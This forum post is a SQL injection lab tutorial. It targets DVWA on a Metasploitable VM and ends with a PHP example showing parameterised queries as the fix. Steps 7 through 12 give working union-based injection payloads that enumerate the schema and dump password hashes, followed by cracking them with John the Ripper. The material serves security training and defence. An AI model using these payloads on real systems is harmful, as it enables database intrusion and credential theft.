Forum Thread: SQL Injection Lab PT.1 – Intro/Lab Setup

In this lab, we'll begin a series on SQL injection. It will be a multi-part article/guide on SQL injection.

  • Let's start with the lab setup (we will see these steps in detail in future posts):

Kali Linux (or BT 5r3) VM and Metasploitable VM in NAT mode.
> Check the IP address of both devices.

Step-by-step instructions

Step 1:

Open Kali Linux (or BT 5r3)

Step 2:

Open your browser and type http://<IP address of Metasploitable>/dvwa/login.php

Step 3:

Log in with user name "admin" and password "password"

Step 4:

Click on DVWA Security and set it to low then submit

Step 5:

Click on manual SQL injection

Step 6:

In the User ID box, type 1 and submit

(PHP select statement: $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";)

Step 7:

%' or '0'='0
(mysql> SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';)

Step 8:

Get DB version: %' or 0=0 union select null, version() #

Step 9:

Get DB user: %' or 0=0 union select null, user() #

Step 10:

Get DB name: %' or 0=0 union select null, database() #
Get schema information: %' and 1=0 union select null, table_name from information_schema.tables #

Step 11:

Get the user tables from the schema information: %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#

Get all the column fields of the users table from information_schema: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #

Step 12:

Let's get the password authentication hashes: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

Now copy all the hashes into a notepad in the format below

E.g. user:password

Save it to /pentest/passwords/john as dvwa_password.txt
Open a console and go to /pentest/passwords/john
cd /pentest/passwords/john
Now launch John the Ripper

./john --format=raw-MD5 dvwa_password.txt and hit Enter.
(You will get the passwords)
… OK Gurkhas, we'll continue this in the next part.
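Why the Step 7 input changes the result, and what closes the hole, shown as an added example (not DVWA's code and not from the original post): the Step 6 query built by string concatenation next to the same lookup with a bound parameter. Assumptions: an in-memory SQLite database reached through PDO stands in for the lab's MySQL server, the rows are constructed sample data, and the function names are hypothetical.

```php
<?php
// Added example. Assumption: SQLite in memory replaces the lab's MySQL
// database so the script runs offline; the rows below are constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT)");
$db->exec("INSERT INTO users VALUES (1,'admin','admin'), (2,'Gordon','Brown'), (3,'Pablo','Picasso')");

// Pattern from Step 6: the input becomes part of the SQL text, so a quote
// in $id ends the string literal and the rest is parsed as SQL.
function lookup_concat(PDO $db, string $id): array
{
    $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
    return $db->query($getid)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened form: the SQL text is fixed and the input travels separately as
// a bound value, so it is only ever compared against user_id as data.
function lookup_bound(PDO $db, string $id): array
{
    $stmt = $db->prepare("SELECT first_name, last_name FROM users WHERE user_id = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Inputs from Step 6 and Step 7 of the lab.
$inputs = ["1", "%' or '0'='0"];

foreach ($inputs as $in) {
    printf(
        "input=%-14s numeric_check=%-6s concat_rows=%d bound_rows=%d\n",
        $in,
        // An allow-list check is a useful second layer for an ID field.
        ctype_digit($in) ? 'pass' : 'reject',
        count(lookup_concat($db, $in)),
        count(lookup_bound($db, $in))
    );
}
```

With the Step 7 input, the concatenated query returns every row in the table while the bound query returns none; with the input 1, both return the single matching row.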
